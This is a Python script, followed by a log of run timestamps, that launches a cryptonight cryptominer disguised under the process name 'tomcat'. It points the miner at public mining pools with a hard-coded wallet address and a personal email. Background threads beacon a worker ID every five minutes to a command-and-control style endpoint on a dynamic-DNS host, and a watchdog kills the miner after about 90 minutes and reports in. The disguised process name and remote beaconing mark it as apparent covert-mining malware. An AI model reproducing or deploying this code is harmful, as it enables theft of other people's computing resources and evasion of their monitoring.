import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:17:04.207864
#2018-02-17 16:05:07.882894
#2018-02-17 17:52:04.766762
#2018-02-17 19:39:07.051633
#2018-02-17 21:28:05.366458
#2018-02-17 23:12:05.184404
#2018-02-18 00:58:07.107150
#2018-02-18 02:46:07.989675
#2018-02-18 04:37:01.697122
#2018-02-18 06:28:04.023776
#2018-02-18 08:16:07.157677
#2018-02-18 10:04:04.074382
#2018-02-18 11:50:07.077405
#2018-02-18 13:35:08.693679
#2018-02-18 15:25:07.767421
#2018-02-18 17:13:06.470249
#2018-02-18 19:01:05.461955
#2018-02-18 20:48:06.384156
#2018-02-18 22:34:05.243642
#2018-02-19 00:22:02.044711
#2018-02-19 02:08:07.534931
#2018-02-19 03:55:06.408049
#2018-02-19 05:41:07.797272
#2018-02-19 07:30:09.875689
#2018-02-19 09:20:07.977460
#2018-02-19 11:09:07.521758
#2018-02-19 12:56:06.118604
#2018-02-19 14:42:07.763500
#2018-02-19 16:29:07.878848
#2018-02-19 18:15:09.320648
#2018-02-19 20:03:04.488926
#2018-02-19 21:51:01.856486
#2018-02-19 23:36:08.626989
#2018-02-20 01:22:04.516856
#2018-02-20 03:12:04.192411
#2018-02-20 04:59:03.586365
#2018-02-20 06:42:03.606764
#2018-02-20 08:28:06.924264
#2018-02-20 10:13:05.229459
#2018-02-20 11:57:07.367311
#2018-02-20 13:44:06.198835
#2018-02-20 15:33:08.826027
#2018-02-20 17:20:04.723921
#2018-02-20 19:09:05.946177
#2018-02-20 20:58:01.954900
#2018-02-20 22:42:01.357176
#2018-02-21 00:24:02.035492
#2018-02-21 02:09:06.554145
#2018-02-21 03:56:05.491327
#2018-02-21 05:43:04.895635
#2018-02-21 07:31:07.885589
#2018-02-21 09:16:08.269867
#2018-02-21 11:06:02.231089
#2018-02-21 12:52:08.535392
#2018-02-21 14:41:07.910143
#2018-02-21 16:29:04.543483
#2018-02-21 18:20:05.707759
#2018-02-21 20:05:08.743737
#2018-02-21 21:52:03.114947
#2018-02-21 23:39:03.931489
#2018-02-22 01:27:04.203089
#2018-02-22 03:15:08.964457
#2018-02-22 05:04:04.653648
#2018-02-22 06:46:07.436030
#2018-02-22 08:36:04.140991
#2018-02-22 10:23:07.043841
#2018-02-22 12:08:05.196841
#2018-02-22 13:53:04.077760
#2018-02-22 15:40:10.159370
#2018-02-22 17:26:10.981971
#2018-02-22 19:15:09.190850
#2018-02-22 21:08:01.878080
#2018-02-22 22:53:07.294968
#2018-02-23 00:39:06.520690
#2018-02-23 02:27:03.738734
#2018-02-23 04:16:07.193923
#2018-02-23 06:03:06.634374
#2018-02-23 07:48:05.452693
#2018-02-23 10:07:03.647789
#2018-02-23 12:01:04.596094
#2018-02-23 13:52:07.641715
#2018-02-23 15:42:07.223710
#2018-02-23 17:29:09.041263
#2018-02-23 19:18:01.323304
#2018-02-23 21:01:06.884866
#2018-02-23 22:49:05.106775
#2018-02-24 00:37:07.938139
#2018-02-24 02:27:05.290816
#2018-02-24 04:18:03.609042
#2018-02-24 06:06:07.762138
#2018-02-24 07:53:05.628697
#2018-02-24 09:37:07.635574
#2018-02-24 11:32:06.679058
#2018-02-24 13:23:05.339711
#2018-02-24 15:12:05.598330
#2018-02-24 17:01:04.010135
#2018-02-24 18:49:01.936127
#2018-02-24 20:39:05.184383
#2018-02-24 22:46:07.390054
#2018-02-25 02:08:03.671708
#2018-02-25 05:39:01.915614
#2018-02-25 11:35:05.794369